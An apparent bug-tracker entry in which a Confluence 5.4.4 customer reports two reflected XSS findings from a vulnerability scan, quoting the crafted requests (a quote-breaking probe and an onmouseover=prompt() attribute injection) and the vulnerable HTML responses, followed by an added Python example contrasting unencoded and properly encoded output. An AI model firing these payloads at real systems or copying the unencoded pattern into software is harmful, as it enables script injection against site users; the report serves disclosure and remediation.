Details
Bug
Resolution: Fixed
Medium
5.4.4
None
Production
5.5
Description
Good morning,
I wanted to tell you that, when running vulnerability tests on Confluence, the same XSS vulnerabilities were thrown.
Version tested: 5.4.4
What steps should I follow to fix their vulnerabilities?
Or will the vulnerabilities be resolved by you?
I attached the vulnerabilities:
1)
GET /spacedirectory/view.action?selectedSpaceCategory=%27%22+ns%3d+netsparker(0x002414)+ HTTP/1.1
Response:
<div id="space-directory-wrapper">
<nav class="aui-navgroup aui-navgroup-vertical" id="space-directory" data-selected-tab='" ns= netsparker(0x002414) >
<div class="aui-navgroup-inner">
<ul id="space-system-list" class="aui-nav">
2)
GET /labels/viewlabel.action?ids=1703943&ids=589833&ids=2916356&ids=589837&ids=1703945&key=API%22%20onmouseover%3dprompt(927382)%20bad%3d%22 HTTP/1.1
Response:
<li class="aui-label" data-label-id="1703943">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382) bad="&ids=589837&ids=1703945&ids=589833&ids=2916356">en</a>
</li><li class="aui-label" data-label-id="589833">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382) bad="&ids=589837&ids=1703945&ids=1703943&ids=2916356">kb-how-to-article</a>
</li><li class="aui-label" data-label-id="2916356">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382) bad="&ids=589837&ids=1703945&ids=1703943&ids=589833">llamadas</a>
</li><li class="aui-label" data-label-id="589837">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382) bad="&ids=1703945&ids=1703943&ids=589833&ids=2916356">api</a>
</li><li class="aui-label" data-label-id="1703945">
<a class="minus-label" rel="nofollow" href="/label/API" onmouseover=prompt(927382) bad="/api+en+kb-how-to-article+llamadas">creación</a>
</li>
I remain waiting for a prompt response.
Thanks and regards
Adonis Pate
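The two reflections in the report, reproduced with and without output encoding. This is an added example, not part of the original report and not Confluence's own code. The function names are hypothetical, the id list is shortened, and Python's standard library stands in for the template layer's encoders.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Parameter values from the two requests in the report, URL-decoded.
CATEGORY = "'\" ns= netsparker(0x002414) "
KEY = 'API" onmouseover=prompt(927382) bad="'
IDS = ["1703943", "589833"]  # shortened id list (assumption)

def tab_unsafe(category):
    # Raw value in a single-quoted attribute: a ' ends the attribute early.
    return "<nav id=\"space-directory\" data-selected-tab='%s'>" % category

def tab_safe(category):
    # html.escape(quote=True) encodes & < > " and ', so the value stays inside.
    return ("<nav id=\"space-directory\" data-selected-tab='%s'>"
            % html.escape(category, quote=True))

def label_link(key, ids, safe):
    pairs = [("key", key)] + [("ids", i) for i in ids]
    if safe:
        # 1) percent-encode each query value, 2) HTML-encode the whole URL.
        query = urlencode(pairs)
        href = html.escape("/labels/viewlabel.action?" + query, quote=True)
    else:
        # Behaviour seen in the report: the key is copied into href as-is.
        query = "&".join("%s=%s" % p for p in pairs)
        href = "/labels/viewlabel.action?" + query
    return '<a class="minus-label" rel="nofollow" href="%s">en</a>' % href

class _FirstTag(HTMLParser):
    attrs = None
    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = attrs

def first_tag_attrs(markup):
    """Return the (name, value) pairs an HTML parser sees on the first tag."""
    parser = _FirstTag()
    parser.feed(markup)
    parser.close()
    return parser.attrs

if __name__ == "__main__":
    for safe in (False, True):
        names = [n for n, _ in first_tag_attrs(label_link(KEY, IDS, safe))]
        print("safe=%s attributes: %s" % (safe, names))
    print(tab_unsafe(CATEGORY))
    print(tab_safe(CATEGORY))
```

In the unencoded link the parser reports extra `onmouseover` and `bad` attributes, matching the response in the report; in the encoded link only `class`, `rel` and `href` remain and the original key is still recoverable from the query string.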